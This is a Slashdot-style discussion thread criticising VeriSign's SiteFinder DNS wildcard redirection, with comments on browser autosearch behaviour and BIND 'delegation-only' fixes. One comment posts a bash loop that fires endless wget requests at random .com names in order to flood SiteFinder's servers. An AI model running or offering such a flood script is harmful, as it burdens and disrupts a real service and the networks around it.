I seem to remember something about a big pile of tomatoes at the last NANOG meeting in Chicago, where Verisign defended sitefinder to a very hostile crowd of network admins. Was to be a symbolic gesture of our disdain for the system. What part of, "We don't like sitefinder, it breaks DNS standards, we think it sucks, and you need to die, or at least spend several weeks in a bed with tubes sticking out of you," did they not understand?

A redundancy... on the main article

[ArbiterOne]

Especially since saying "...leaving the DNS service alone..." is redundant. DNS = Domain Name Service. That's like saying Domain Name Service service. Or like saying PIN number... or ATM machine...

Re:A redundancy... on the main article

ATM, DNS, and PIN all have multiple meanings, depending on context, so it's not entirely redundant. "Verisign" provides enough context that "DNS" alone should suffice.

Re:A redundancy... on the main article

>Or like saying PIN number... or ATM machine...

But that's exactly what is commonly done, innit?

Re:A redundancy... on the main article

[PhilipPeake]

Oh ... you mean like that splash screen on Win2k: Based on NT Technology What does NT stand for --- New technology, so we have : Based on New Technology Technology Some people just shouyldn't be left in charge of a pencil ... let alone a computer, or even a mouth!

Re:A redundancy... on the main article

[trp0]

or my personal teeth grinder: NIC card

Re:A redundancy... on the main article

[mino]

Well, not technically true, despite the fact that it's commonly believed to be so. NT is short for 'N-Ten', the codename of the Intel i860 processor on which it was originally intended to run.

'New Technology' is a later marketing retrofit.

Re:A redundancy... on the main article

Er..
my theory is that NT is MS shifted one letter in the alphabet, just like HAL -> IBM.

Here's another way to do that

[Pervertus]

Thank you google.

ICANN should've said NO in the first place

[etherkill]

I'm with the general consensus who feel that this is a 'very bad thing'. However - ICANN made a big mistake in announcing it would undertake 'reviews'.

They should have simply given a big fat NO to Versign's Sitefinder in the first place.

Leaving the subject open for discussion was a big mistake, IMHO.

Let them.

[Stormbringer]

The annoyance factor and the outrage will be big pushes for the OpenDNS idea, especially once the cc people wise up and get on board to stop the extortion.

Maybe ICANN won't notice as everybody migrates away from their little empire of root servers until everybody's already used to the idea; that will eliminate the 'single point of political failure'.

Verisign is busy proving all over again that FLOSS has been demonstrating: when it comes to the Internet, the only people you can trust are everybody.

Re:capitalism at its best...

[orthogonal]

If I were a shareholder, I wouldn't ask them to do this at all. Sure, it may boost short-term profits for them, but in the long-term, it could cause consumer rebellion against them and the revenue lost would probably far outweigh the short-term benefit

You're absolutely right.

But.

I don't know how Verisign's top management is compensated, but a big problem in the last decade across corporations has been the practice of tying executive compensation to short-term stock prices.

In other word (and again, I don't know this to be a fact in Verisgn's case) it may be that it's very bad for long-term stock price, very bad for common shareholders, ultimately bad for regular employees (who end up being laid off when the chickens come home to roost), but still very good for top management.

Mihh

[BenBenBen]

Still, he added, it would be tough for VeriSign to win the public relations war because its opponents are highly regarded technologists.

So, to paraphrase, it'll be hard to convince the public that SiteFinder is any good, becuase the people who say it's useless and buggers up the internet know what they're talking about.

I *heart* corporate thinking.

Re:And microsoft does this anyway to all windows u

[nmg196]

IIRC, IE will take you immediately to a search engine without displaying any error message. This is the annoying and broken behaviour that the OP was talking about.

You recall incorrectly. If you type in a proper domain name, IE will just give you a "This page cannot be displayed - Cannot find server or DNS Error". It only tries to do a search if you type in non domain name type expressions. eg a phrase with spaces or a single word without any dots in it which doesn't match a local host.

I expect it to say "domain name not found". End of story.

That's exactly what it does say! Why do people keep confusing what happens if you type in *words*, with what happens if you type in a *domain*?

Please *try* these things before posting misleading rubbish that will only spark further trollish messages.

(I have tried all of the above in IE6)

Re:And microsoft does this anyway to all windows u

[thoth39]

In Firefox, you're redirected to Google if you type such things as "ugh" or "linux rulez". Those are obviously search keywords.

If you type "www.no-such-domain.com" you're not redirected to Google, as the parent post says.

Re:And microsoft does this anyway to all windows u

Why doesn't this work in Internet Explorer 6.0 under Windows XP Professional? Plz advise kthnx.

The Internet is NOT the Web!

[RGautier]

The Internet is a connected suite of protocols that work off of a similar top layer of technology, permitting multiple types of information transfer. Granted, the WWW, being the kick-ass application it is, is a very large part of this. However, what people ALWAYS fail to realize is that Electronic Mail, FTP, SSH, Telnet, Internet Gaming, X-Windows, ICQ, AIM, and every other Internet program under the sun utilizes DNS to try to get where it's going. When Verisign turns on its crappy service, what happens is that every OTHER program that relies on host names will be SCREWED UP. Why? Because instead of an error message that says you are trying to access a host that doesn't exist, you'll get a message that is much more similar to the fact that the host is unavailable! That means when you send an email message to dumbshit@verisiggn.com by mistake, instead of getting a response back immediately that you typed in a bad address, your message will sit in a queue for 3 days, and then you'll get an error message saying that your recipient couldn't be reached. This will cause you to contact your system administrator, and waste hours of his time, and time at other remote administrators because no one will catch the typo until after they've exhausted all the possible reasons your mail systems cannot talk to each other. System Admins RELY on error messages that make sense. When those are absent, answering user questions of 'It doesn't work - fix it' is VERY VERY DIFFICULT. This message is just for those of you who appear to not have a clue just how much frustration this causes, and who think that this makes even a modicum of sense to do.

Re:And microsoft does this anyway to all windows u

[mordejai]

It looks nice to me... :-)
Reminds me of the times when I was 4:900/763.1

Technologists and Public Relations Wars

[ReadParse]

Still, he added, it would be tough for VeriSign to win the public relations war because its opponents are highly regarded technologists.

Come again? Since when are "highly regarded technologists" given a second thought by the average user? Their thinking is...

"Let's see... www dot... oh, I hate these computers... where's the g? hootmaail.como... there! Wait, that's not my mail. This is... uh... oh yeah, silly me. I spelled it wrong. Yes, that's the one I want... I'll that... wait... online dry cleaning... I need THAT."

And that is the END of the thought process. They don't think about whether or not it's a helpful service unless a surveyor puts a gun to their head and makes them commit one way or the other. They certainly don't think about asking the "highly regarded technologists".

Re:Mydoom.V

[RGautier]

They're in disuise?

Patch for BIND

Anyone know where I can get the anti-Verisign patch for BIND?

Re:Patch for BIND

[sik0fewl]

I'm not sure if it's available as a patch, but you can download the latest version of BIND and you'll be set.

And then, as AKnightCowboy pointed out earlier:

zone "com" {
type delegation-only;
};

zone "net" {
type delegation-only;
};

not controversial with users?!?!?

[bonkedproducer]

WTF? I seem to remember tons of users complaining, as in the vast majority of them that knew what was going on. I'm a user, it was controversial to me!

It was controversial to the courts! It broke tons of in place software. It got them sued.... what part of all that isn't negative?

Re:capitalism at its best...Well Monopoly...

[ReaperOfSouls]

I know this is troll bait, but I will bite.

Capitalism works on the premise of competition. Because they are the sole athoritative root for all .com/.biz domains, they have been given a monopoly. No other company can do this since they don't control the athoritative root for those domains.

Beyond that it fundementally changes the way the internet works to the benifit of a single company. This is very anticompetitive.

If I were a shareholder, I would tell them to drop all of its plans for site finder since eventually it will lead to a loss of all of its domain registration revenues.

Re:capitalism at its best...Well Monopoly...

[RGautier]

Sounds like a wonderful case to take to the Department of Justice.

Re:And microsoft does this anyway to all windows u

[gnu-generation-one]

"But Slashdot would be awkward when called "66.35.250.150, news for nerds, stuff that matters" instead..."

It would also not work, as all the links point back to the slashdot.org domain, so it requires a DNS lookup to follow any link

Re:And microsoft does this anyway to all windows u

[tunah]

Nope, it doesn't do this for domain names, only things that look like keywords, no dots, spaces etc. You can turn it off/change the behaviour if you want. (Hell, you've got the source code if that's not enough :-P)

But Mozilla choose Google fairly arbitrarily - why not use Yahoo? Or Wikipedia? And anyone who argues "it's the #1 search option" gets a free copy of IE, the #1 browser, from your good friends at Monopolysoft ;)

Okay, how about because it's the _best_ search option?

Re:And microsoft does this anyway to all windows u

[alien_blueprint]

Please *try* these things before posting misleading rubbish that will only spark further trollish messages.

If I had Windows available here, I would have. That's why I put "IIRC" in there. I was certainly right, in that it *sometimes* (depending on some text analysis) whisks you off to a search page. That's what I was recalling.

I just wasn't able to replicate it in Firebird as I didn't understand that it (and MSIE) was differentiating between "proper text" and domain names.

However, I actually consider this behaviour to be bad in *both* browsers, so just take a deep breath and settle down a bit.

They can't fix this

[0x0d0a]

Many mail delivery systems will do something like the following (I know this from a black-box-user perspective, not someone who's implemented it). They'll look up the MX record for the domain, and if one is nonexistant, look for an A record. If there is an A record, it will attempt to directly deliver the email to any SMTP server running on the host.

I like this style of functionality quite a bit -- it means that I can simply send mail to user@static-domain-name. In any event, all those systems inevitably dump mail at SiteFinder.

Commentary on VP Galvin's idiocy

[RGautier]

According to the Washington Post, Galvin said that the continued opposition stems from "an ideological belief by a narrow section of the technological community who don't believe you should innovate the core infrastructure of the Internet." I think Galvin is missing the fact that we ARE for the innovation of the core infrastructure of the Internet - just not in the way he would hope. After all, I'm all for revoking Verisign's IP address reservations.

Interview with Stratton Sclavos, he's the devil

[hqm]

There is an interview with Stratton Sclavos,CEO of Verisign, at http://news.com.com/2008-7347-5092590.html.

SclavosThe reason Site Finder became such a lightening rod is that it goes to the question of are we going to be in a position to do innovation on this infrastructure or are we going to be locked into obsolete thinking that the DNS was never intended to do anything other than what it was originally supposed to do?

Q:Still, a lot of people in the Internet community were quite surprised by Site Finder--and then you had complaints surfacing that it was not complying to approved standards.

Sclavos:Let's break the argument down: The claim that Site Finder was nonstandard and that we should have informed the community we were doing something nonstandard--excuse me: Site Finder is completely standards-compliant to standards that have been out and published by the IETF (Internet Engineering Task Force) for years. That's just a misnomer. The IAB (Internet Architecture Board) in its review of Site Finder said the very same thing--that VeriSign was adhering to standards.

His definition of "standards-compliant" is a cynical and deceptive one. Sure, the SiteFinder is complying with the standard, in that it is returning well formatted packets. However the content of those packets are lies. They are lying by saying that domains exist when they do not, in order to fool web browsers into loading the commercial content that Verisign wants to get to web surfers.

It is analogous to saying that if I put a detour sign in the middle of the freeway to direct traffic to my shopping mall, that I am obeying the traffic sign protocols.

The comment about "ninety-nine percent of the traffic is pure HTTP" is a shorthand way to sum up why it is not possible to communicate with Verisign's executives, and why they must be stopped and soon.

Because it wouldn't matter if one hundred percent of the traffic on the internet were HTTP, it still is not a reason to break DNS in order to insert advertising. The "service" they claim to be providing should be provided by the browsers, giving everyone a chance to implement their own solution to the problem of mistyped domain names. Then many possible solutions to this issue can be innovated. By breaking DNS to lie about the existence of domain names, they actually prevent anybody else from providing any solution. This is the exact opposite of innovation. And they are smart people at Verisign, they clearly and obviously know all this, and yet they are lying to every one about it. And that, in a nutshell is what makes me more furious about this than any other Internet legal issue has in a long long time, maybe ever, or at least since Network Solutions took the .com database offline and made it their own private property.

There was a story I heard once, about a company (Novell ?) which implemented their own file transfer protocol over the network. They did not use exponential backoff on retransmit, which made their protocol look much faster than TCP/IP. It would in fact hog all the bandwidth, bumping out all the more polite and well behaved protocols. This was great for them, but in fact as the network approached saturation, the system would fail catastrophically, for reasons obvious to Internet protocol designers.

At some meta-level, this is what is happening to the Internet itself now. Verisign is itself like the bad protocol, which does not play well with others. It is taking advantage of an opportunity which gives it a short term advantage, while degrading the entire network protocol infrastructure.

Re:Interview with Stratton Sclavos, he's the devil

[glwtta]

DNS was never intended to do anything other than what it was originally supposed to do

Ah, but was it supposed to do what it wasn't intended?

Re:Interview with Stratton Sclavos, he's the devil

[bluGill]

I've worked with file transfer protocols that didn't use backoff. However they required someone configure the maximum bandwidth they could use, and assumed a leased line. Sure you were running over IP, but you had dedicated bandwidth.

In the case of high latency links (think geosynchronous satelites) the standard TCP implimentations do not have a big enough window to saterate a link. If you bought a link with guaranteed bandwidth with an application in mind that needed that much, you need to write your won protocol. Sure you could modify TCP, but that means you need to check if you are on the dedicated line, or the standard network.

Running such a protocol on the internet is impolite and a bad idea. Running it on lines you own is a much different matter.

Re:Interview with Stratton Sclavos, he's the devil

Because it wouldn't matter if one hundred percent of the traffic on the internet were HTTP, it still is not a reason to break DNS in order to insert advertising.

Hmm...if 100% is HTTP traffic, then we could pretty much just get rid of DNS and all the other extraneous protocols, right?

That was the idea behind RealNames

[blorg]

Unfortunately, or otherwise, they just couldn't get critical mass and folded when MS took them out of IE (possibly because they wanted to emphasise MSN search instead).

There are good reasons for a hierarchy. Control is devolved, rather than concentrated in a single body. Each country has control of their own TLD, (excepting those that have sold it off) and believe it or not outside the US they *are* used, particularly for local businesses. And so on to the following levels: a domain owner has the freedom to set up as many third-level subdomains as they like (smtp.mydomain.com, pop3.mydomain.com, etc.). I don't know how this would work with a single-word system.

Anyway, many browsers *will* try .com on the end if you type in a single word, or you can just stick your favourite sites in your hosts file:

66.35.250.150 slashdot

Re:That was the idea behind RealNames

[lexxeh]

Something I recently noticed in Firebird is that single-word urls ('slashdot') are parsed thru Google's 'I'm feeling lucky'. Which is kinda cool. So long as you know the name of the site/company, and it's reasonably well-established, it works fine.

Re:That was the idea behind RealNames

[SomeGuyFromCA]

Actually, anything you type in the address bar that doesn't look like a valid address is sent to IFL.

Another one of those is a variation on the ctrl-enter ie thing:

Type "slashdot" in the address bar:
[Enter] will feed it to IFL.
[Ctrl-Enter] will add www. and .com
[Shift-Enter] will add www. and .net
[Ctrl-Shift-Enter] will add www. and .org

What's the time period about

[digitalgimpus]

How does that time period resolve privacy issues?

The sitefinder service has privacy issues. From mali sent to invalid domains to people mistyping a website address.

On a sidenote, there other's who run root servers. Why don't they get a chunk of the change generated by sitefinder to defray costs, and perhaps expand and add more servers for yet more redundancy.

Re:DNS only works well with single authoritative r

[vranash]

You don't *NEED* to, you just have them configure their searchpath to go through 'blah.home.net' for example and if they type in 'foo' for example they'd poll 'foo.blah.home.net' first instead of foo.com/net/org

-- vranash

Re:And microsoft does this anyway to all windows u

[fyonn]

yes I have, thats irrelevant to if someone decides not to use DNS. they can always define the name in their hosts file, access the site correctly and still not use DNS.

dave

Re:And microsoft does this anyway to all windows u

[platipusrc]

I think that you can change which search engine you would like to use in IE with "Tweak UI." It's been a while since I've run Windows, so I'm not entirely sure, but that seems to be right.

No More ICANN

ICANN should have followed up and yanked Verisign/Network Solutions off the net for that fiasco. The fact that they didn't means DNS will fragment as ICANN control is purely by committee. Anyone can set up a root server.

And I suspect many more will.

Thanks for the sites, will watch them grow.

Re:DNS only works well with single authoritative r

"the domain system only really works if we all agree"

Yes, but they are not listening. There is no agreement. You take it as they provide it or not at all. This will be the demise of .com and others will grow.

Re:You're just dumb

[wastaz]

FireFOX is an install now actually.

Blackboard

[Detritus]

Those idiots at Verisign need a new assignment, writing 1000 times on a blackboard, "The Internet is not the World Wide Web".

I can't understand how anyone with half a clue could have deployed such an obviously broken service.

So let me get this straight...

[musicscene]

... that another company is going to force feed me it's propaganda... like a commercial on TV. I am deeply bothered by this.

What can we, the little people (thanks Rev. Horton Heat - That's Showbiz) do to avoid this? Instead of their $itefinder coming up, I'd rather see a close match, or at very least a random site. I'd rather see nothing like I do now.

There has got to be something. Open DNS?

Problem caused by sitefinder the first time around

[McVerne]

Thought I'd share a real life example of sitefinder causing non-trivial trouble with something.

After sitefinder was originaly turned on, a number of players of an certain game were crashing when they entered the game's online matchmaking lobby.

Why?

The MOTD for the game was retrieved from a webserver and copied into a fixed length buffer before being shown.

At some point in the past the game's publisher started redirecting all requests to the webserver that had the MOTD page to another, much larger in size, page. Which overflowed the buffer and crashed the game.

One of the players decided to do something about it while waiting for things to be put back to the way they were. They modified one of the game files with a hex editor, munging the domain name to a non-existing one, and distributed the modified file to a number of other players.

This stopped the crashing, until months later, long after the company fixed the MOTD page, when sitefinder came along. Then the munged domain suddenly started serving up pages, and again the game was crashing.

Now granted, the problem was 100% a result of bugs in the game, but it was still triggered by sitefinder.

Makes me wonder how many other programs are out there with similar bugs.

--McVerne

time to upgrade our iptables

I'll make iptables rules to go to google instead of those money-making loosers, or just drop all traffic to them.

We don't want your shit!

Unbelievable

"Site Finder was not controversial with users, 84 percent of whom said they liked it as a helpful navigation service," said Tom Galvin, VeriSign's vice president of government relations.

That's because 84% of people didn't understand how it worked or why it was bad. It like asking people if they'd like to get 80 miles to the gallon in their car, but not telling them they would have to use fuel that's $10/gallon. Of course they'll say yes when they don't know all the facts.

Nonsense

[Quiet+Sound]

Zero US soldiers died in Germany during the occupation. Same with Japan.
http://slate.msn.com/id/2087768/

Re:Nonsense

http://capmag.com/article.asp?ID=3137

Posting an opinion piece as fact doesn't cut it

This screws up localhost, too

[spike2131]

This annoys the crap out of me... especially in regards to localhost. If I'm testing a web server on my local machine, and I'm screwing with the configurations so for whatever reason the localhost is down.... and I type in "localhost"... I would like to get an error message. Instead, Firebird I get directed to the extremely obnoxious website at http://localhost.net.au - which is a shill for search engine optimization software. I don't want to go to this stupid site, but it happens to be the number one site for a search on localhost for google. I guess their SEO software works....

If we have to be redirected - and I don't like THAT at all - I'd much prefer to go to http://www.localhost.com, which at least has a service to automatically redirect you back to 127.0.0.1.

One way to solve this, I think, is to knock the parasitic localhost.net.au from its top ranking for google "localhost" searches. To that end, please indulge me for a little bit of civic minded google bombing... localhost localhost localhost localhost localhost.

Mind you, I'm not associated with http://www.localhost.com, but I certainly appreciate their service!

Re:Looks like like they already have - confiirmed

[geoffspear]

YHBT.

Can't we just have standard behaviour ?

[clickety6]

Everybody knows what to expect when you mistype a DNS name - pages of porn!

Re:Can't we just have standard behaviour ?

[TiggsPanther]

But that's exactly what SiteFinder is!

Some wannabe's trying to fuck as many people as they can in public.

Tiggs

Re:Bug much worse than that

You do realize that bug in the game would allow anyone to run any code on your system they wanted to just by altering the MOTD page. All an attacker would have to do is either register the munged domain name and put up a web server (if using the patch) or break into the original motd site and change the motd to exploit the buffer overrun condition.

Really...

[Tuxedo+Jack]

Interesting. While the whole "DDoS-the-whole-Internet-thanks-to-SiteFinder" is an interesting concept, we can now technically consider them as a group of browser hijackers.

Can we tack them in with CoolWebSearch and their ilk now? Or is CWS slightly better than them?

Here's another one: OpenNIC

[Lev_Arris]

http://opennic.org

You forgot...

You forgot "I was just helping that sheep over a fence." (AKA the "Great Scottish Lie" :o)

DNS Fix

[Inuchance]

Here's a fix to ensure that you don't have to use Sitefinder: Type domain names in correctly.

Not a troll, it's a joke!

[blorg]

In fairness, it's not a troll, there *is* a smiley immediately after the domain name. Also, if you actually look at the text on the destination page, you might notice that rather than being a simple duplication of Sitefinder, it is making a comment on Verisign's potential aims with such a service.

Re:Not a troll, it's a joke!

[SpaceLifeForm]

Heh. Good one. At least it wasn't goat related. But damn, it would have been a good thing (tm) if Verisign had done it early.

Re:And microsoft does this anyway to all windows u

[proj_2501]

he was arguing for the web browser popping up a search engine, not a DNS redirect.

Cyber-squatting

[trafik]

What if every slashdotter was to a launch cyber-squatting claim against them? Or better yet, launch a *huge* number of claims against them.

Think about it:

yourdomain.com <---- the only valid name
yuordomain.com
yyourdomain.com
yourdomian.com
yoordomain.com ...

There are nearly unlimited possibilities.

Do you think they would learn a lesson then? I think they might...

Re:Cyber-squatting

Errm, no. Surely they'd just enjoy all the extra domain registrations and the money that brings them.

Re:Cyber-squatting

[pdcryan]

I think you're on to something. I'm actually doing my law school research on the topic as we speak... The problems would be: -who would have standing (the trademarks that are infringed by VeriSign might have to be from a holder who has a service similar to SiteFinder - something like a search engine or a web portal should do... example: searchgoogle.com is protected derivative of google's intellectual property, that would resolve to SiteFinder - and would result in sufficient consumer confusion) -getting around the "registration" requirement of the cybersquatting statutes

Innovation in the core?

[kindbud]

I say no. That the core is dumb is one of the reasons the internet is available to everyone. That the core is dumb is one of the reasons it is so reslient. That the core is dumb is the reason we can assign stewardship - not ownership - to Verisign, and yank it away from them when they misstep.

Keep the core dumb. No innovation is necessary or wanted.

Re:And microsoft does this anyway to all windows u

[cr@ckwhore]

Telnet to port 80 at the target IP, issue a valid http 1.1 GET and don't forget to pass the Host header in your request. Viola! Like magic.

Re:capitalism at its best...

[Horny+Smurf]

Stock options as executive payment really took off in the mid 90s.

There are plenty of reasons, but one big one was that Bill Clinton changed tax law so that only 1 million of a CEO's (or other eexecutive) salary could be considered a business expense. A $12 million salary would now cost $3 million extra in taxes. However, a $1 million salary with $11 million of stock options wouldn't "cost" extra.

Should CEO's get exorbitant pay? You probably don't think so, but they do sign a paycheck for thousands of employees and contribute to our economy.

Meanwhile, it's not unusual for a hollywood movie star to make $20 million for 3 months of work, with only a temporary employment opportunities for the "little guys". Yet it's deductable as a business expense.

Re:And microsoft does this anyway to all windows u

[kooshvt]

You can actually configure IE to disable the autosearch feature or select one of several other popular search engines. Open the search sidebar and click customize -> autosearch settings. This is a feature I don't mind having at the browser level.

Re:And microsoft does this anyway to all windows u

[meznak]

Not to promote IE, but it also has an option to disable the autosearch "feature."

Re:And microsoft does this anyway to all windows u

[Shirotae]

Try http://localhost:8888/; it is a real URL, but Firebird 0.7 (I haven't upgraded yet) will take you to an SEO company via www.localhost.net.au if you are not running a local web server on that port. It will do this even if you follow it as a link, it is not limited to things explicitly typed in the address bar.

I think "keyword.enabled" should be 'false' by default. You can at least switch the feature off if you do not want it; there will be no such switch if VeriSign deploy their service.

I generally dislike features where someone else has decided what they think I ought to want to happen if something does not work. "I was only trying to be helpful" is a feeble excuse for covering up the first warning that something is wrong.

Re:And microsoft does this anyway to all windows u

[msl_80]

OK, I tried it out. IE 6.0, Windows 2000 (I use Opera 99% of the time, so a curse on you for forcing me to open IE).

URL entered: www.nochancethisisreal.com
Result: Redirected to ninemsn.com.au search engine. Specifically, http://search.ninemsn.com.au/dnserror.aspx?FORM=DN SAS&q=www.nochancethisisreal.com

URL entered: http://www.nochancethisisreal.com
Result: Cannot find server or DNS error.

Draw your own conclusions.

Contact Verisign -- feedback address still active?

I don't know if it is still active, but on their (rather optimistic) PR accouncement from September of last year Verisign lists sitefinder@verisign-grs.com as an address for feedback. Back then, they said they "invite additional comments". I wonder if it still works?

Re:And microsoft does this anyway to all windows u

[nmg196]

Mine doesn't do this. I guess it must be configurable somewhere?

Re:And microsoft does this anyway to all windows u

[JuggleGeek]

I'm running Win98, using Opera for a browser, and you are either guessing (and wrong) or outright lying.

Using IE does redirect to http://search.msn.com/dnserror.aspx?FORM=DNSAS&q=w ww.u90asdfwa.com, but that's hardly what you claimed - and it doesn't apply to all windows users.

I wonder if Darl and Stratton have lunch meetings

[hqm]

to figure out how to rape the Internet and steal more stuff from the naive geeks who built it in good faith and for all humanity.

This is simply theft by an "employee".

[argent]

Sitefinder is like discovering your receptionist has decided to redirect all wrong phone numbers to her cousin's "dial-a-psychic" service, and the janitor's been putting ads for his brother's body shop on everyone's desk.

Verisign doesn't own the "product" they're selling, they're just operating it for ICANN. This is no more a legitimate business than, oh, the original Napster was.

Re:And microsoft does this anyway to all windows u

[JuggleGeek]

IE will take you immediately to a search engine without displaying any error message.

Bullshit.

Oh, don't forget Verisign is running RFID!

[argent]

"Thanks to our new Productfinder service, when you can't find what you're looking for and you put a can back on the shelf its RFID will automatically locate the product you really wanted and deliver it to the store (for a small fee, which you agreed to electronically when you put he can back on the shelf) so it will be waiting for you when you check out!"

Re:And microsoft does this anyway to all windows u

[msl_80]

A quick Google later... and yes, it is configurable.

Changing IE's default search behaviour

I went to Autosearch settings, and changed the setting to "Do not search from the address bar". Now I can type in "flafflemuffins" and it'll try to go to http://flafflemuffins/

I'm still staying with Opera, but this could come in handy for testing URLs on a local LAN with IE.

Re:And microsoft does this anyway to all windows u

Dude your userid is pretty low (not as low as mine hahaha ok nevermind I am too lazy to log in), anyway, you should know how this works on /.

Re:And microsoft does this anyway to all windows u

[vivian]

Imagine what it would be like trying to remember addresses under ipv6...

Re:And microsoft does this anyway to all windows u

[Tim+C]

It's configurable, at least in IE. Tools -> Internet Options -> Advanced -> "Do not search from the address bar".

(I use Mozilla, not Firebird, so I can't help with that one)

Re:And microsoft does this anyway to all windows u

[Frennzy]

my conclusion is that you didn't change the default behavior...."Do Not Search From The Address Bar" is an option under settings.

Re:And microsoft does this anyway to all windows u

[edbarrett]

You do know that there's a lot more to the Net than the Web, right? And that having a website returned instead of the spec-ordered "No such domain" when you're using a different Net scheme (like email, or chat, or good ol' gopher) is fundamentally Wrong

It's not returning a web page, though. Your DNS resolver asks for, and receives, the numerical address to which the domain name is bound. Now, the fact that it's your browser using the resolver means that your browser goes out and retrieves a web page under false pretenses (because Verisign lied and said the domain name you typed exists when it doesn't); it's not like DNS said "Here's a web page in response to your query".

I'm not saying I disagree with your sentiment, just that it's wrong for a whole bunch of other reasons. Imagine an "intelligent" (for want of a better word) Yellow Pages that happens to display phone numbers for phone-sex services (who are paying YP for the redirection) whenever you look up the wrong company. Or the local crank that gives people directions to the nearest crack house when they ask him how to get to the mall.

take the fight to the government

[Fry-kun]

If anyone remembers, the Internet was originally created as a defense network, able to withstand a nuclear explosion *snicker*
Somebody can just accuse VeriSign of tampering with the internet in such way that it may stop being a reliable communication network ...and if that doesn't really apply, then we can file an antitrust suit: VS is a monopoly in this field; they have no right to enforce sitefinder if nobody else can compete

tell me why i'm full of it to svist^at$hotmail*com

Re:it's not a lie if there is a grain of truth to

[DarkBlackFox]

[i]"Site Finder was not controversial with users"[/i]

The other thing to keep in mind is the small percentage of internet users who are tech-savy enough to realize the implications of SiteFinder. Joe and Jane Sixpack don't care, or even notice, given that all they do is send and recieve email, check movie times, etc. If they mis-type a URL, and sitefinder comes up, they'll think nothing more of it than if their computer were infected with searchhook spyware, which would return some random page in place of "Cannot Find Server."

It really puts geeks in a tough position, considering we understand virtually everything about the internet and it's internals, yet comprise a surprisingly small percentage of the world's online population.

Therefore, if the majority of internet users don't notice, VeriSign doesn't see a problem. It's not controversial if the majority doesn't care.

Remember the script

[buford_tannen]

#!/bin/bash

# Fuck up the Verisign SiteFinder DNS Hijacker system
# created from collaboration on slashdot:
# http://slashdot.org/comments.pl?sid=80714&cid=7111 460

while true; do wget --tries=1 --timeout=5 -O /dev/null http://`dd if=/dev/urandom bs=80 count=1 2>/dev/null | tr -d -c '[:xdigit:]'`.com/ ; done

And it still will break DNS...

[dacarr]

"VeriSign officials said they have taken pains to remedy any technological problems that Site Finder caused and maintained that Internet users benefit from the service."

In otherwords, they didn't just enact "sitefinder.verisign.com" and make it a VOLUNTARY SERVICE, like they should have in the first place, rather than having it resolve to (nxdomain) and fsck up DNS.

Re:And microsoft does this anyway to all windows u

[Lord+Zerrr]

Site Admins

Problem: IE is displaying its own error documents and thinks it knows better than you about your own site.

Solution: Make the error document larger than 512 bytes

technical solution, and it will cost Verisign

[ajagci]

You'll probably see proxy DNS servers and DNS libraries that first look up the DNS record, then try to connect to the web server on the address they find, and finally return a corrected DNS record depending on whether the web server is Verisign's or not.

As a result, Verisign will be serving a lot of useless pages and eating up a lot of extra bandwidth. Eventually, that's going to cost them. Let's hope it will cost them enough that they will stop this nonsense.

Re:And microsoft does this anyway to all windows u

[Nodatadj]

Surely defining the name in a hosts file is still using DNS?

Are they deaf?

Not controversial with users? Maybe we didn't shout loud enough,

WE HATE SITE FINDER

I think we should all drop them an email saying "controversial is an understatement, we find it repulsive"

just a thought

Re:You're just dumb

[SethJohnson]

And the punishment for downloading a binary and running it is? Please provide a link to the acceptable use policies of your school. I'd like to see what school prohibits browser choice in such a draconian manner.

Re:And microsoft does this anyway to all windows u

[Cuthalion]

If you don't like it, you don't even need to change browsers. You can also configure it to use whatever search engine you want, or not to search at all.

Re:And microsoft does this anyway to all windows u

[Ice_Balrog]

When I do that I just get a Not found error...

But I do agree with you that that should definitely be a GUI pref (and I don't mean about:config).

What users?

[butane_bob2003]

Who used sitefinder? It was one of those ambiguous sites we all hate which claimed to be the 'portal to everything'. It should stay dead. I don't want to be redirected to sitefinder everytime I mistype a url. The only 'users' they had were misled into thinking they found what they were looking for. Once they realized they had stumbled across a useless 'portal', they usually would go hit google.

Actually, it's hilarious

[devphil]

How, exactly, would one "work around" breakage that can't be programmatically detected? It's not like in Hollywood movies, where the packets come back tainted and twirling little mustaches and giving shifty glances.

Query: "Is foo.bar.com a valid address?"

DNS answer: "Yes. It resolves to a.b.c.d."

Now tell me how to decide whether it really is valid, or whether it's an advertisement. Without actually contacting a.b.c.d on port 80 to see what comes back.

Re:Actually, it's hilarious

[MrLizardo]

Easy, because the DNS answer is from one of a finite number of verisign owned IP addresses, which can be blocked without too much effort.

-Chan Secodina

Re:Actually, it's hilarious

[devphil]

Aha! Good point, thanks.

Yeah, we'd have to do this in the resolver libraries themselves, rather than in the source of the utilities... *head off to find source code*

Re:And microsoft does this anyway to all windows u

Huh? That is definitely not what Firebird does. Not by default anyway.

so many +5 comments...

[stile]

Everyone seems to be able to say something Informative or Insightful on this topic. Come on. It's just too easy, folks.

Re:so many +5 comments...

[argent]

I guess it's one of those "opposites attract" stories. There's no clue at Verisign, so slashdot has to counterbalance it somehow...

Re:And microsoft does this anyway to all windows u

[BillyBlaze]

For complex systems like this, there are many things you can change to have the same effect. But changing some things will have huge negative side effects, while changing others will only be positive.

Having web browsers perform a search when a domain that doesn't exist is typed is a good thing. But implementing it at the DNS level is the worst possible way to do it. For one, nobody can choose anymore - instead of being able to change a browser setting, my browser's search code will never be invoked, because everything will redirect to sitefinder. And it breaks many other things - reverse DNS for spam. It's like taking cyanide for a headache: your dead, but at least your head doesn't hurt!

A Yotta-Yottabyte, That's a LOTTA Bytes!

[A55M0NKEY]

Yeah I was going to say that too before I saw it expressed so eloquently in your post..

So instead I'll have to say this: Lord I'm one, Lord I'm two, Lord I'm three, Lord I'm four, Lord I'm fi-ve hundred yocto-zepto-atto-fermi-pico-nano-micro-milli-centi -deci-deka-hecta-kilo-mega-giga-tera-peta-exa-zett a-yotta-angstroms away from home. Away from home awway from home....

Web Browser is the *right* place for this

[billstewart]

Here's how DNS and applications are supposed to interact for nonexistent sites:

• If your web browser queries the DNS for nonexistent.com and DNS tells you that it doesn't exist, having the web browser do something friendly like try looking it up in a search engine is *technically clean*, and whether you view this as friendly hand-holding or a saccharine overdose is a matter of UI taste, and the fact that they default to using their own search engine is sensible if greedy (besides, you can change it.)
• If your telnet/ssh/voip client queries DNS to find nonexistent.com, DNS tells your client it doesn't exist, and the client gives you some appropriate error message.
• If your outbound SMTP server queries DNS for nonexxistent.com, DNS tells you it doesn't exist, and it sends an appropriate bouncegram to your mailbox saying the site doesn't exist, you realize you mistyped the address and resend.
• If your inbound SMTP server gets a message claiming to be from nonexistent.com, and your server's spam-detection function checks DNS and DNS says it doesn't exist, your SMTP server can reject the mail saying "Go Away, Spammer".

